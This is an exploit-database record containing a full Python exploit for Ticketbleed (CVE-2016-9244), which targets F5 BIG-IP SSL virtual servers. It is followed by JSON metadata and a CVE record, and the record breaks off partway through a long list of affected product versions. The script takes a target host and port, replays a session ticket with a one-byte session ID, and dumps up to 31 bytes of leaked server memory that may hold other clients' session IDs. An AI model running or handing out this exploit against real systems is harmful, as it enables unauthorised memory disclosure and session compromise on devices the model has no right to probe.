ID 1337DAY-ID-30168 Type zdt Reporter @0x00string Modified 2018-04-12T00:00:00
Description
Exploit for hardware platform in category remote exploits
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
def banner():
print '''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''
def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target port\n"
"\n\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 443\n"
"python script.py --rhost 10.10.10.10 --rport 8443")
exit()
def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",
def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)
i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d
def ticketBleed (rhost, rport):
h = (rhost,int(rport));
version = TLSVersion.TLS_1_2
secret = ""
session_ticket = ""
sid = ""
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
sock.sendall(packet)
sock.recvall()
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
sock.sendall(to_raw(TLSFinished(), ctx))
ret = sock.recvall()
session_ticket = ret[TLSSessionTicket].ticket
secret = ctx.master_secret
#pretty("*", "ctx 1: \n" + str(ctx))
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
sock.tls_ctx.resume_session(secret)
sock.sendall(packet)
ret = sock.recvall()
sid = ret[TLSServerHello].session_id
#pretty("*", "ctx 2: \n" + str(ctx))
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
def main():
rhost = None;
rport = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
banner()
if rhost is None or rport is None:
usage()
ticketBleed(rhost,rport)
exit(0);
if __name__ == "__main__":
main()
# 0day.today [2018-04-13] #
{"sourceData": "# -*- coding: utf-8 -*-\r\n#!/usr/bin/python\r\n# Exploit Title: Ticketbleed\r\n# Google Dork: n/a\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: https://f5.com/\r\n# Software Link: https://support.f5.com/csp/article/K05121675\r\n# Version: see software link for versions\r\n# Tested on: F5 BIGIP 11.6\r\n# CVE : CVE-2016-9244\r\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\r\nimport re, getopt, sys, socket\r\nfrom struct import *\r\ntry:\r\n from scapy_ssl_tls.ssl_tls import *\r\nexcept ImportError:\r\n from scapy.layers.ssl_tls import *\r\n \r\ndef banner():\r\n print '''\r\n lol ty filippo!\r\n ty tintinweb!\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\r\n'''\r\n \r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target port\\n\"\r\n \"\\n\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 443\\n\"\r\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\r\n exit()\r\n \r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n \r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n \r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n return d\r\n \r\ndef ticketBleed (rhost, rport):\r\n h = (rhost,int(rport));\r\n version = TLSVersion.TLS_1_2\r\n secret = \"\"\r\n session_ticket = \"\"\r\n sid = \"\"\r\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\r\n sock.sendall(packet)\r\n sock.recvall()\r\n packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\r\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\r\n sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\r\n sock.sendall(to_raw(TLSFinished(), ctx))\r\n ret = sock.recvall()\r\n session_ticket = ret[TLSSessionTicket].ticket\r\n secret = ctx.master_secret\r\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\r\n sock.tls_ctx.resume_session(secret)\r\n sock.sendall(packet)\r\n ret = sock.recvall()\r\n sid = ret[TLSServerHello].session_id\r\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\r\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\r\n \r\ndef main():\r\n rhost = None;\r\n rport = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n ticketBleed(rhost,rport)\r\n exit(0);\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-04-13] #", "description": "Exploit for hardware platform in category remote exploits", "sourceHref": "https://0day.today/exploit/30168", "reporter": "@0x00string", "href": "https://0day.today/exploit/description/30168", "type": "zdt", "viewCount": 33, "references": [], "lastseen": "2018-04-13T07:49:34", "published": "2018-04-12T00:00:00", "cvelist": ["CVE-2016-9244"], "id": "1337DAY-ID-30168", "modified": "2018-04-12T00:00:00", "title": "F5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure Exploit", "edition": 1, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2018-04-13T07:49:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9244"]}, {"type": "f5", "idList": ["F5:K05121675"]}, {"type": "seebug", "idList": ["SSV:92673"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140168", "OPENVAS:1361412562310140194", "OPENVAS:1361412562310140155", "OPENVAS:1361412562310140223", "OPENVAS:1361412562310140192", "OPENVAS:1361412562310140221", "OPENVAS:1361412562310140179", "OPENVAS:1361412562310140169", "OPENVAS:1361412562310140178", "OPENVAS:1361412562310140181"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EE5EA4ECE0C61538EC30487A371A1C90", "EXPLOITPACK:4DF698AC9A73D3D4108BA1E66FD1CF8C"]}, {"type": "exploitdb", "idList": ["EDB-ID:41298", "EDB-ID:44446"]}, {"type": "nessus", "idList": ["F5_SESSION_ID_MEM_DISCLOSURE.NASL", "F5_BIGIP_SOL05121675.NASL"]}, {"type": "filippoio", "idList": ["FILIPPOIO:40FACE5F541A5201E7FCDFC21AC6E3D2", "FILIPPOIO:32170BE31128BEE98AEEE466ABFDA40A"]}, {"type": "nmap", "idList": ["NMAP:TLS-TICKETBLEED.NSE"]}], "modified": "2018-04-13T07:49:34", "rev": 2}, "vulnersScore": 5.1}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:28:13", "description": "A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-09T15:59:00", "title": "CVE-2016-9244", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9244"], "modified": "2019-06-06T15:11:00", "cpe": ["cpe:/a:f5:big-ip_application_acceleration_manager:11.5.1", "cpe:/a:f5:big-ip_analytics:11.5.2", "cpe:/a:f5:big-ip_link_controller:11.6.1", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.1", "cpe:/a:f5:big-ip_application_security_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.4.0", "cpe:/a:f5:big-ip_access_policy_manager:11.6.1", "cpe:/a:f5:big-ip_application_security_manager:12.1.1", "cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:f5:big-ip_link_controller:11.5.2", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.4", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.2", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.0", "cpe:/a:f5:big-ip_access_policy_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.4.1", "cpe:/a:f5:big-ip_analytics:11.4.0", "cpe:/a:f5:big-ip_application_security_manager:11.6.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.2", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.1", "cpe:/a:f5:big-ip_link_controller:12.1.1", "cpe:/a:f5:big-ip_link_controller:11.5.4", "cpe:/a:f5:big-ip_link_controller:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:12.1.0", "cpe:/a:f5:big-ip_application_security_manager:11.4.0", "cpe:/a:f5:big-ip_link_controller:11.4.0", "cpe:/a:f5:big-ip_analytics:12.1.1", "cpe:/a:f5:big-ip_application_security_manager:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:12.1.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:11.4.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.0", "cpe:/a:f5:big-ip_analytics:11.5.1", "cpe:/a:f5:big-ip_analytics:11.5.4", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.0", "cpe:/a:f5:big-ip_link_controller:11.6.0", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", "cpe:/a:f5:big-ip_application_security_manager:11.5.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.4.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.0", "cpe:/a:f5:big-ip_analytics:11.6.1", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.0", "cpe:/a:f5:big-ip_link_controller:11.5.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:11.5.3", "cpe:/a:f5:big-ip_application_acceleration_manager:11.4.1", "cpe:/a:f5:big-ip_application_security_manager:11.5.1", "cpe:/a:f5:big-ip_protocol_security_module:11.4.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.1", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.3", "cpe:/a:f5:big-ip_link_controller:11.5.3", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.6.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.1", "cpe:/a:f5:big-ip_link_controller:11.5.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.0", "cpe:/a:f5:big-ip_analytics:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.4.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.2", "cpe:/a:f5:big-ip_analytics:11.5.3", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.3", "cpe:/a:f5:big-ip_global_traffic_manager:11.4.0", "cpe:/a:f5:big-ip_analytics:11.5.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.5.4", "cpe:/a:f5:big-ip_application_security_manager:12.1.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.3", "cpe:/a:f5:big-ip_access_policy_manager:12.1.2", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.2", "cpe:/a:f5:big-ip_application_acceleration_manager:11.4.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.4.1", "cpe:/a:f5:big-ip_link_controller:12.1.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.4", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.4", "cpe:/a:f5:big-ip_global_traffic_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.1", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/a:f5:big-ip_link_controller:11.4.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.4.0", "cpe:/a:f5:big-ip_protocol_security_module:11.4.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.0", "cpe:/a:f5:big-ip_analytics:12.1.2", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.1", "cpe:/a:f5:big-ip_analytics:12.1.0", "cpe:/a:f5:big-ip_link_controller:12.0.0", "cpe:/a:f5:big-ip_analytics:11.4.1", "cpe:/a:f5:big-ip_application_security_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.5.0"], "id": "CVE-2016-9244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_protocol_security_module:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.1:*:*:*:*:*:*:*", 